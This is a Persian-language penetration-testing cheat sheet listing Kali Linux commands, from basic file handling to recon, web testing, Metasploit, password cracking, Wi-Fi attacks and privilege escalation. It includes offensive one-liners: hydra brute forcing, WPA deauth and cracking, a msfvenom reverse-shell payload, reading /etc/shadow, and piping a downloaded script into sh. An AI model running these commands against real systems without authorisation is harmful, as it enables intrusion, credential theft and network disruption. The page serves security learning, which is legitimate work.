CHEAT SHEET

دستورات کالی لینوکس

این صفحه یک چیت‌شیت کامل از دستورهای پرکاربرد کالی لینوکس برای هک اخلاقی و تست نفوذ است: ۱۲۲ دستور در ۱۰ دسته، از مبانی لینوکس و شبکه تا شناسایی، اسکن و ابزارهای امنیتی. هر دستور یک توضیح کوتاه فارسی و دکمه‌ی کپی دارد و می‌توانی با کادر جستجو سریع هر چیزی را که می‌خواهی پیدا کنی.

به فینگلیش: dastoorat kali linux، kali linux commands farsi، cheat sheet kali linux، dastoorat linux baraye hack

دستورات کالی لینوکس: چیت‌شیت کامل با توضیح فارسی

۱۲۲ دستور در ۱۰ دسته

مبانی لینوکس

  • pwd

    نمایش مسیر پوشه‌ی فعلی

  • ls -la

    لیست همه‌ی فایل‌ها با جزئیات و فایل‌های مخفی

  • cd /path/to/dir

    تغییر پوشه

  • cp -r src dest

    کپی فایل/پوشه به‌صورت بازگشتی

  • mv old new

    جابجایی یا تغییر نام فایل

  • rm -rf dir

    حذف پوشه و محتوایش (با احتیاط!)

  • mkdir -p a/b/c

    ساخت پوشه‌های تودرتو

  • cat file.txt

    نمایش محتوای فایل

  • less file.txt

    مشاهده‌ی فایل صفحه‌به‌صفحه

  • head -n 20 file

    نمایش ۲۰ خط اول

  • tail -f /var/log/syslog

    دنبال کردن زنده‌ی فایل لاگ

  • grep -rin 'pattern' .

    جستجوی بازگشتی متن بدون حساسیت به حروف

  • find / -name '*.conf' 2>/dev/null

    یافتن فایل‌ها بر اساس نام

  • chmod +x script.sh

    قابل‌اجرا کردن فایل

  • chmod 600 id_rsa

    دسترسی فقط برای مالک

  • chown user:group file

    تغییر مالک و گروه فایل

  • history

    نمایش تاریخچه‌ی دستورات

  • man command

    خواندن راهنمای دستور

  • which nmap

    یافتن مسیر یک برنامه

  • df -h

    نمایش فضای دیسک

  • du -sh *

    حجم هر مورد در پوشه

سیستم و پردازش‌ها

  • ps aux

    لیست همه‌ی پردازش‌های در حال اجرا

  • top

    نمایش زنده‌ی پردازش‌ها و CPU

  • htop

    نمایشگر تعاملی پردازش‌ها

  • kill -9 PID

    بستن اجباری پردازش با PID

  • killall firefox

    بستن پردازش‌ها بر اساس نام

  • jobs

    لیست کارهای پس‌زمینه

  • bg / fg

    ارسال کار به پس‌زمینه/پیش‌زمینه

  • uname -a

    اطلاعات کرنل و سیستم

  • whoami

    نمایش نام کاربر فعلی

  • id

    نمایش شناسه‌ی کاربر و گروه

  • sudo su

    تبدیل به کاربر روت

  • crontab -l

    لیست کارهای زمان‌بندی‌شده

  • systemctl status ssh

    بررسی وضعیت سرویس

  • env

    نمایش متغیرهای محیطی

شبکه

  • ip a

    نمایش کارت‌های شبکه و IPها

  • ifconfig

    نمایش تنظیمات کارت شبکه (قدیمی)

  • ping -c 4 target

    ارسال ۴ بسته‌ی پینگ

  • traceroute target

    ردیابی مسیر بسته‌ها

  • netstat -tulpn

    لیست پورت‌های باز و پردازش‌ها

  • ss -tulpn

    لیست سوکت‌ها و پورت‌ها (مدرن)

  • dig example.com

    استعلام DNS

  • nslookup example.com

    پرس‌وجوی رکوردهای DNS

  • host -t mx example.com

    استعلام رکوردهای ایمیل

  • whois example.com

    اطلاعات ثبت دامنه

  • curl -I https://site

    دریافت فقط هدرهای HTTP

  • curl -s https://site | less

    دریافت بی‌صدای یک صفحه

  • wget https://site/file

    دانلود یک فایل

  • arp -a

    نمایش جدول ARP

  • route -n

    نمایش جدول مسیریابی

  • tcpdump -i eth0 -n

    ضبط بسته‌ها روی یک کارت شبکه

  • nc -lvnp 4444

    شنونده‌ی netcat روی پورت ۴۴۴۴

  • nc target 80

    اتصال به یک پورت با netcat

  • ssh user@host

    اتصال SSH به میزبان راه دور

  • scp file user@host:/tmp

    کپی فایل از طریق SSH

شناسایی و اسکن

  • nmap -sn 192.168.1.0/24

    شناسایی میزبان‌های زنده در یک شبکه

  • nmap -sV target

    تشخیص نسخه‌ی سرویس‌ها

  • nmap -sC -sV target

    اسکن با اسکریپت‌های پیش‌فرض و نسخه

  • nmap -p- target

    اسکن تمام ۶۵۵۳۵ پورت TCP

  • nmap -sU target

    اسکن پورت‌های UDP

  • nmap -A target

    اسکن تهاجمی (سیستم‌عامل، نسخه، اسکریپت)

  • nmap -O target

    تشخیص سیستم‌عامل

  • nmap --script vuln target

    اجرای اسکریپت‌های آسیب‌پذیری

  • masscan -p1-65535 target --rate 1000

    اسکنر پورت بسیار سریع

  • whatweb https://site

    شناسایی فناوری‌های وب‌سایت

  • theHarvester -d example.com -b all

    جمع‌آوری ایمیل و ساب‌دامین (OSINT)

  • dnsrecon -d example.com

    شمارش رکوردهای DNS

  • sublist3r -d example.com

    شمارش ساب‌دامین‌ها

  • amass enum -d example.com

    شمارش عمیق ساب‌دامین‌ها

تست امنیت وب

  • gobuster dir -u https://site -w wordlist.txt

    حدس پوشه‌های وب با wordlist

  • ffuf -u https://site/FUZZ -w wordlist.txt

    فازر سریع وب

  • nikto -h https://site

    اسکن وب‌سرور برای مشکلات

  • wpscan --url https://site

    اسکن سایت وردپرسی

  • sqlmap -u 'https://site?id=1' --batch

    تست خودکار تزریق SQL

  • sqlmap -u URL --dbs

    شمارش دیتابیس‌ها با SQLi

  • curl -X POST -d 'a=b' https://site

    ارسال درخواست POST

  • wfuzz -w wordlist -d 'user=FUZZ' URL

    فاز کردن پارامترهای POST

  • dirb https://site

    اسکنر کلاسیک محتوای وب

متااسپلویت

  • msfconsole

    اجرای کنسول متااسپلویت

  • search type:exploit platform:windows

    جستجوی ماژول‌ها

  • use exploit/multi/handler

    انتخاب یک ماژول

  • set RHOSTS target

    تعیین میزبان هدف

  • set LHOST your_ip

    تعیین IP شنونده‌ی خودت

  • show options

    نمایش تنظیمات ماژول

  • exploit

    اجرای اکسپلویت

  • sessions -l

    لیست نشست‌های فعال

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=4444 -f exe -o s.exe

    ساخت یک پیلود

رمز عبور و هش

  • hydra -l admin -P rockyou.txt ssh://target

    حمله‌ی دیکشنری به ورود SSH

  • hydra -L users.txt -P pass.txt target http-post-form ...

    حمله به فرم ورود وب

  • john --wordlist=rockyou.txt hashes.txt

    شکستن هش‌ها با John

  • john --show hashes.txt

    نمایش رمزهای شکسته‌شده

  • hashcat -m 0 -a 0 hashes.txt rockyou.txt

    شکستن هش MD5 با hashcat

  • hashid hash

    تشخیص نوع هش

  • hash-identifier

    شناساگر تعاملی هش

  • crunch 8 8 -o list.txt

    ساخت لیست کلمات عبور

  • cewl https://site -w words.txt

    ساخت wordlist از یک سایت

وایرلس و وای‌فای

  • iwconfig

    نمایش اطلاعات کارت وایرلس

  • airmon-ng start wlan0

    فعال‌سازی حالت مانیتور

  • airodump-ng wlan0mon

    اسکن شبکه‌های وای‌فای اطراف

  • airodump-ng -c 6 --bssid MAC -w cap wlan0mon

    ضبط هَندشیک روی یک کانال

  • aireplay-ng --deauth 10 -a MAC wlan0mon

    ارسال بسته‌های deauth

  • aircrack-ng cap.cap -w rockyou.txt

    شکستن هَندشیک WPA

  • wash -i wlan0mon

    یافتن اکسس‌پوینت‌های دارای WPS

پس از نفوذ و ارتقای دسترسی

  • sudo -l

    لیست دسترسی‌های sudo کاربر فعلی

  • find / -perm -4000 2>/dev/null

    یافتن فایل‌های SUID برای بالا بردن دسترسی

  • cat /etc/passwd

    لیست کاربران سیستم

  • cat /etc/shadow

    هش رمزهای عبور (فقط روت)

  • uname -r

    نسخه‌ی کرنل (برای اکسپلویت)

  • wget http://ip/linpeas.sh -O- | sh

    اجرای اسکنر ارتقای دسترسی LinPEAS

  • python3 -c 'import pty;pty.spawn("/bin/bash")'

    ارتقای شل به TTY کامل

  • python3 -m http.server 8000

    اشتراک سریع فایل‌ها روی HTTP

  • base64 -d file

    رمزگشایی داده‌ی base64

گیت و ابزارهای متفرقه

  • git clone https://repo.git

    کلون کردن یک ریپازیتوری

  • git log --oneline

    تاریخچه‌ی فشرده‌ی کامیت‌ها

  • tar -xzvf file.tar.gz

    استخراج آرشیو .tar.gz

  • zip -r out.zip folder

    فشرده‌سازی پوشه به zip

  • md5sum file

    محاسبه‌ی چک‌سام MD5

  • sha256sum file

    محاسبه‌ی چک‌سام SHA-256

  • openssl s_client -connect site:443

    بررسی گواهی TLS

  • watch -n1 'command'

    اجرای مکرر دستور هر ثانیه

  • xxd file | head

    نمایش هگز فایل

  • strings binary

    استخراج متن از فایل باینری

می‌خواهی این دستورها را عمیق‌تر یاد بگیری؟

این چیت‌شیت مرجع سریع است. برای یادگیری قدم‌به‌قدم، مقاله و سرفصل زیر را ببین.

سؤال‌های پرتکرار

دستورات کالی لینوکس را از کجا شروع کنم؟

از دسته‌ی «مبانی لینوکس» شروع کن: حرکت بین پوشه‌ها، دیدن و ویرایش فایل، دسترسی‌ها و جستجو. وقتی با ترمینال راحت شدی، سراغ شبکه، شناسایی و اسکن برو. همه‌ی این دستورها استاندارد و آموزشی‌اند و روی هر توزیع لینوکس هم کار می‌کنند.

آیا کار با این دستورها قانونی است؟

خود دستورها ابزارند و یادگیری‌شان کاملاً قانونی است. اما اسکن، شکستن رمز یا بهره‌برداری فقط روی سیستم خودت یا هدفی مجاز است که صاحبش کتبی اجازه داده باشد. روی سیستم دیگران بدون اجازه، جرم است.

این دستورها فقط برای کالی لینوکس‌اند؟

نه. بیشترشان دستورهای استاندارد لینوکس و ابزارهای متن‌بازند که روی اوبونتو، دبیان و توزیع‌های دیگر هم اجرا می‌شوند. کالی فقط این ابزارها را از پیش نصب‌شده دارد، برای همین برای تمرین راحت‌تر است.

چطور یک دستور را سریع پیدا کنم؟

از کادر جستجوی بالای صفحه استفاده کن؛ می‌توانی هم نام دستور (مثلاً nmap) و هم بخشی از توضیح فارسی را تایپ کنی. با دکمه‌ی «کپی» کنار هر دستور هم می‌توانی آن را مستقیم در ترمینال بچسبانی.

آماده‌ای این دستورها را در یک مسیر عملی و قدم‌به‌قدم یاد بگیری؟ دوره‌ها و کارگاه‌های هک اخلاقی و امنیت سایبری را ببین.

دیدن دوره‌ها